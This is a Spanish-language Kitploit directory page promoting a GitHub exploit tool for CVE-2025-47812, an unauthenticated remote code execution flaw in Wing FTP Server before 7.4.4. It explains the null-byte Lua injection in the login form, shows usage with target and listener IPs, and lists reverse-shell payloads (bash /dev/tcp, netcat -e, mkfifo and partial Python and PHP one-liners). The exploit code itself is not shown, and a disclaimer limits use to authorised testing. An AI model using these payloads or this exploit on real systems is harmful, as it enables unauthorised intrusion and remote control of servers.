Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/blindma1den/cve-2025-47812
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed TeamingHerramienta de Acceso Remoto
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Explotación de ejecución remota de código no autenticada para Wing FTP Server < 7.4.4, que permite la ejecución de comandos y shells inversas mediante inyección de Lua en archivos de sesión.

13hace 1 añoAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-47812 - Ejecución Remota de Código (RCE) en Wing FTP Server

===========================================================

Autor: blindma1den

Fecha: Julio 2025

Tipo de Exploit: Ejecución Remota de Código (No autenticado)

Objetivo: Wing FTP Server < 7.4.4

Puntuación CVSS: 10.0 (Crítico)


DESCRIPCIÓN

Este script explota CVE-2025-47812, una vulnerabilidad crítica en la interfaz web de Wing FTP Server que permite a atacantes remotos ejecutar comandos arbitrarios del sistema o abrir una shell inversa sin autenticación.

La falla es causada por un manejo incorrecto de bytes nulos (%00) en el formulario de inicio de sesión (/loginok.html). Esto permite la inyección de código Lua en archivos de sesión, que luego se evalúan cuando se accede a endpoints como /dir.html.


FUENTES

NVD Description: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


CARACTERÍSTICAS

  • Ejecución de comandos (ej., whoami, uname -a)
  • Múltiples payloads de shell inversa
  • Extrae automáticamente la cookie de sesión UID
  • Implementación limpia y modular en Python 3

  • REQUISITOS

    • Python 3.7+
    • Módulo requests

    Instalar dependencias:

    root@kitploit:~
    pip install requests
    

    USO

    Ejecuta el script:

    root@kitploit:~
    python3 wingftp_rce_exploit.py
    

    Se te solicitará:

    • URL objetivo (ej., http://127.0.0.1:5466)
    • Nombre de usuario (por defecto: anonymous)
    • Modo de exploit: [1] Ejecutar un comando [2] Lanzar shell inversa

    EJEMPLOS

    [1] EJECUTAR COMANDO:

    root@kitploit:~
    URL objetivo: http://192.168.1.10:5466
    Nombre de usuario: anonymous
    Tu elección (1 o 2): 1
    Comando a ejecutar (por defecto: whoami): whoami
    

    [2] SHELL INVERSA:

    root@kitploit:~
    URL objetivo: http://192.168.1.10:5466
    Nombre de usuario: anonymous
    Tu elección (1 o 2): 2
    Dirección IP de la shell inversa: 192.168.1.100
    Puerto de la shell inversa: 4444
    

    Inicia tu listener antes de disparar la shell:

    root@kitploit:~
    nc -lvnp 4444
    

    PAYLOADS UTILIZADOS (SHELL INVERSA)

    Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

    Python3: python3 -c 'import socket,subprocess,os; ...'

    Netcat: nc IP PORT -e /bin/sh

    PHP: php -r '$sock=fsockopen("IP",PORT); ...'

    FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


    DESCARGO DE RESPONSABILIDAD

    Este código es solo con fines educativos. NO utilices este exploit contra sistemas que no poseas o para los que no tengas autorización explícita para probar. El uso no autorizado es ilegal y poco ético.

    Parchea tus sistemas de inmediato. Wing FTP Server 7.4.4 resuelve esta vulnerabilidad.

    ¡Feliz hacking!

    Descargar herramienta